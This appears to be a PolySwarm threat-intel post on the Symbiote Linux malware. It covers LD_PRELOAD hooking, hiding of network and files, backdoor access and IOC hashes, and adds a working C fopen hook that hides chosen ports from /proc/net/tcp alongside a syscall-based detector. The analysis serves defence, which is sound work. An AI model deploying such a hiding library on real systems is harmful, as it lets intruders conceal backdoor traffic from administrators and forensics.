
Symbiote Linux Malware

Written by PolySwarm Tech Team | Jun 20, 2022 4:01:49 PM



Executive Summary

Intezer and BlackBerry recently reported on Symbiote, a difficult-to-detect Linux malware that, rather than running as its own executable, loads itself into the processes already running on an infected system.

Key Takeaways

  • Symbiote primarily targets financial institutions in Latin America.
  • Symbiote acts as a parasite, hijacking existing processes.
  • Symbiote is difficult to detect, as it hides itself and its network traffic.
  • Symbiote’s three main objectives are to evade detection, provide backdoor access, and harvest credentials.

What is Symbiote?

In our 2021 Year in Review, we predicted an uptick in Linux malware for 2022. Symbiote is Linux malware named for its symbiote-like behavior: in symbiosis, one organism lives with and depends on another, in a relationship that can benefit both or that can be parasitic. Symbiote was first detected in November 2021, targeting financial institutions in Latin America, and the domain names in its infrastructure impersonate high-profile Brazilian banks. It is not yet clear whether the malware is being used for highly targeted or broad attacks.

Symbiote is not a standalone executable. It is a shared object that the dynamic loader injects into processes through LD_PRELOAD, so it lives as a parasite inside programs that are already on the system. A preloaded object is loaded before the program's other shared libraries, which lets it interpose on (hijack) the imports an application would otherwise resolve from those libraries. Once loaded, Symbiote hooks libc and libpcap functions and hides itself and any accompanying malware. Because file, process, and network artifacts are all filtered inside the hooked process, the malware is hard to detect even during live forensics on the running host. Two properties of the mechanism matter for defenders: LD_PRELOAD takes effect only in dynamically linked programs started after the preload is in place (whether it is set in the environment or in /etc/ld.so.preload), and it never affects statically linked binaries.

The list of file names Symbiote hides is stored RC4-encrypted in the binary. When a hooked function is called, Symbiote dynamically loads libc, resolves the original function, and calls it, so the caller sees normal behavior apart from the scrubbed results. Because Symbiote is loaded through LD_PRELOAD, a tool such as ldd would ordinarily list the malware among a binary's loaded objects. To prevent this, Symbiote hooks execve and watches for calls made with the environment variable LD_TRACE_LOADED_OBJECTS set to 1, which is how ldd asks the dynamic loader to print the objects it would load. When it sees such a call, Symbiote runs the loader as ldd would but scrubs its own entry from the output.

Symbiote hides its network activity using three separate methods:
  • In the first method, Symbiote hooks fopen and fopen64. If the calling application opens /proc/net/tcp, Symbiote creates a temp file and copies the header line (the first line) into it. It then scans each remaining line for the ports it wants to hide: a line containing one of those ports is skipped, and every other line is written to the temp file. Symbiote then closes the real file and returns the temp file's stream to the caller in its place, so the calling process sees a scrubbed result that omits the connections the malware wants hidden.
  • In the second method, Symbiote hijacks any packet-filtering bytecode (BPF) that a process installs on a socket. Intezer and BlackBerry observed filtering of both inbound and outbound traffic by port and by IPv4 address. This lets the malware keep its TCP packets out of captures taken on the infected host.
  • In the third method, Symbiote hooks libpcap functions to filter out UDP traffic to domain names on a list it carries. For each packet received, the malware checks the UDP payload for substrings of those domains. On a match it drops the packet and increments a counter; its hook on pcap_stats then subtracts that counter from the true packet count, so the statistics a capture tool reports stay consistent with the packets it was allowed to see.

With the shared object loaded into every process, the threat actor has user-land rootkit functionality. Symbiote also provides a backdoor: it lets the attacker log in as any user on the victim's system with a hardcoded password and execute commands with the highest privileges. Threat actors can use Symbiote to harvest credentials and to maintain persistence through remote access.
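The two mechanisms above that are easiest to reason about in code are the LD_PRELOAD interposition itself (resolving the real libc function behind the hook and calling it) and the first hiding method, the fopen hook that hands the caller a scrubbed copy of /proc/net/tcp. The following is an added example written for this post, not Symbiote's code and not taken from the Intezer and BlackBerry analysis. The hidden port list (4444 and 31337), the sample /proc/net/tcp content, and the helper names are this example's own constructions; Symbiote keeps its real list RC4-encrypted in the binary. Build it as a shared object (for example `gcc -shared -fPIC -o hide.so hide.c -ldl`) and run `LD_PRELOAD=./hide.so cat /proc/net/tcp` to see the two entries disappear while the header and the other connections remain.

```c
#define _GNU_SOURCE                 /* RTLD_NEXT, fmemopen, fopen64 */
#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifndef RTLD_NEXT                   /* glibc/musl value, in case headers were seen before _GNU_SOURCE */
#define RTLD_NEXT ((void *) -1L)
#endif
#ifdef fopen64                      /* some libcs make fopen64 a macro for fopen; we export the real symbol */
#undef fopen64
#endif

/* Ports whose connections the hook hides. Constructed for this example; Symbiote keeps its
 * real list RC4-encrypted inside the binary. */
static const uint16_t HIDDEN_PORTS[] = { 4444, 31337 };

/* Constructed /proc/net/tcp content: sshd listening on 22, a shell bound to 4444, a client
 * connected out to 31337, and an HTTPS connection that must survive scrubbing. */
const char SAMPLE_PROC_NET_TCP[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18101 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0100007F:115C 0200A8C0:C36C 01 00000000:00000000 00:00000000 00000000  1000        0 18240 1 0000000000000000 20 4 30 10 -1\n"
    "   2: 0200A8C0:E7A2 0A00A8C0:7A69 01 00000000:00000000 00:00000000 00000000  1000        0 18355 1 0000000000000000 20 4 30 10 -1\n"
    "   3: 0200A8C0:D4F0 0A01A8C0:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 18402 1 0000000000000000 20 4 30 10 -1\n";

static int port_hidden(unsigned port)
{
    for (size_t i = 0; i < sizeof HIDDEN_PORTS / sizeof HIDDEN_PORTS[0]; i++)
        if (HIDDEN_PORTS[i] == port)
            return 1;
    return 0;
}

/* An entry starts "  sl: LOCALIP:PORT REMOTEIP:PORT st ..." with address and port in hex
 * (0100007F:115C is 127.0.0.1:4444). The header line and anything unparsable are kept so the
 * result still looks like a normal /proc/net/tcp. */
static int entry_hidden(const char *line)
{
    unsigned sl, lip, lport, rip, rport;
    if (sscanf(line, " %u: %8x:%4x %8x:%4x", &sl, &lip, &lport, &rip, &rport) != 5)
        return 0;
    return port_hidden(lport) || port_hidden(rport);
}

/* Copy `in` to `out` line by line, dropping hidden entries. Returns how many were dropped. */
int scrub_proc_net_tcp(FILE *in, FILE *out)
{
    char line[512];
    int dropped = 0;
    while (fgets(line, sizeof line, in)) {
        if (entry_hidden(line)) { dropped++; continue; }
        fputs(line, out);
    }
    return dropped;
}

/* Run the scrubber over in-memory streams so it can be exercised without touching /proc. */
int scrub_string(const char *in, char *out, size_t outsz)
{
    memset(out, 0, outsz);
    FILE *fi = fmemopen((void *) in, strlen(in), "r");
    FILE *fo = fmemopen(out, outsz, "w");
    if (!fi || !fo) {
        if (fi) fclose(fi);
        if (fo) fclose(fo);
        return -1;
    }
    int dropped = scrub_proc_net_tcp(fi, fo);
    fclose(fi);
    fclose(fo);
    return dropped;
}

typedef FILE *(*fopen_fn)(const char *, const char *);

/* Interposed fopen: everything passes straight through to libc except /proc/net/tcp, where the
 * caller receives an unlinked temp file holding the scrubbed copy in place of the real stream. */
FILE *fopen(const char *path, const char *mode)
{
    static fopen_fn real_fopen;
    if (!real_fopen)
        *(void **) &real_fopen = dlsym(RTLD_NEXT, "fopen");   /* libc's fopen, next in load order */
    FILE *f = real_fopen(path, mode);
    if (!f || strcmp(path, "/proc/net/tcp") != 0)
        return f;
    FILE *tmp = tmpfile();
    if (!tmp)
        return f;                  /* fail open rather than crash the host process */
    scrub_proc_net_tcp(f, tmp);
    fclose(f);
    rewind(tmp);
    return tmp;
}

/* Large-file variant: some builds of netstat and similar tools call this one instead. */
FILE *fopen64(const char *path, const char *mode)
{
    return fopen(path, mode);
}
```

The hook covers only the procfs path the write-up describes. A tool that asks the kernel over netlink sock_diag (as modern ss does by default) never opens /proc/net/tcp, and /proc/net/tcp6 and the UDP tables are separate files; whether Symbiote itself covers those paths is not something the analysis above states.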
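Because every hook described above lives in user space, inside libc's and libpcap's call paths, a check that bypasses those paths can expose the scrubbing. The following added example (not from PolySwarm, Intezer, or BlackBerry, and not Symbiote's code) reads /proc/net/tcp twice in one process, once through stdio, which is the path a hooked fopen sees, and once through raw syscalls, which LD_PRELOAD cannot interpose, and reports entries present in the raw view but missing from the libc view. It also checks whether an LD_PRELOAD mechanism is configured at all, via the environment variable or /etc/ld.so.preload. The buffer sizes and function names are this example's choices. Its limits are worth stating: syscall() is itself a libc wrapper that a preload could in principle interpose, /proc/net/tcp can change between the two reads (rerun on a transient difference), and a hook that goes deeper may hide more; a statically linked tool, which LD_PRELOAD never touches, is the stronger check.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Read a file with raw syscalls. LD_PRELOAD can only interpose symbols the dynamic loader
 * resolves; it cannot sit between these syscalls and the kernel. */
ssize_t read_via_syscall(const char *path, char *buf, size_t bufsz)
{
    long fd = syscall(SYS_openat, AT_FDCWD, path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    size_t total = 0;
    while (total < bufsz - 1) {
        long n = syscall(SYS_read, fd, buf + total, bufsz - 1 - total);
        if (n <= 0)
            break;
        total += (size_t) n;
    }
    syscall(SYS_close, fd);
    buf[total] = '\0';
    return (ssize_t) total;
}

/* Same file through stdio: this is the path a hooked fopen() sees and can scrub. */
ssize_t read_via_stdio(const char *path, char *buf, size_t bufsz)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    size_t n = fread(buf, 1, bufsz - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (ssize_t) n;
}

/* Count lines of `reference` that do not appear as whole lines in `view`. */
int count_missing_lines(const char *reference, const char *view)
{
    int missing = 0;
    char *copy = strdup(reference);
    if (!copy)
        return -1;
    for (char *line = strtok(copy, "\n"); line; line = strtok(NULL, "\n")) {
        size_t len = strlen(line);
        const char *p = view;
        int found = 0;
        while ((p = strstr(p, line)) != NULL) {
            int at_start = (p == view || p[-1] == '\n');
            int at_end = (p[len] == '\n' || p[len] == '\0');
            if (at_start && at_end) { found = 1; break; }
            p++;
        }
        if (!found)
            missing++;
    }
    free(copy);
    return missing;
}

/* 1 if an LD_PRELOAD mechanism is configured: the environment variable, or a non-blank
 * /etc/ld.so.preload (read with raw syscalls so a file-hiding hook cannot filter it). */
int preload_configured(void)
{
    const char *env = getenv("LD_PRELOAD");
    if (env && *env)
        return 1;
    char buf[4096];
    ssize_t n = read_via_syscall("/etc/ld.so.preload", buf, sizeof buf);
    for (ssize_t i = 0; i < n; i++)
        if (buf[i] != ' ' && buf[i] != '\t' && buf[i] != '\n' && buf[i] != '\r')
            return 1;
    return 0;
}

int main(void)
{
    static char raw[1 << 16], via_libc[1 << 16];
    printf("LD_PRELOAD mechanism configured: %s\n", preload_configured() ? "yes" : "no");
    if (read_via_syscall("/proc/net/tcp", raw, sizeof raw) < 0 ||
        read_via_stdio("/proc/net/tcp", via_libc, sizeof via_libc) < 0) {
        perror("/proc/net/tcp");
        return 1;
    }
    int missing = count_missing_lines(raw, via_libc);
    printf("entries in raw view missing from libc view: %d\n", missing);
    return missing ? 2 : 0;
}
```

Run it with `LD_PRELOAD` pointing at a hooking library to see the discrepancy; on a clean host it should report no preload and zero missing entries.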

IOCs

PolySwarm has multiple samples of Symbiote.

f55af21f69a183fb8550ac60f392b05df14aa01d7ffe9f28bc48a118dc110b4c

121157e0fcb728eb8a23b55457e89d45d76aa3b7d01d3d49105890a00662c924

45eacba032367db7f3b031e5d9df10b30d01664f24da6847322f6af1fd8e7f01

You can use the following CLI command to search for all Symbiote samples in our portal:

$ polyswarm link list -f Symbiote
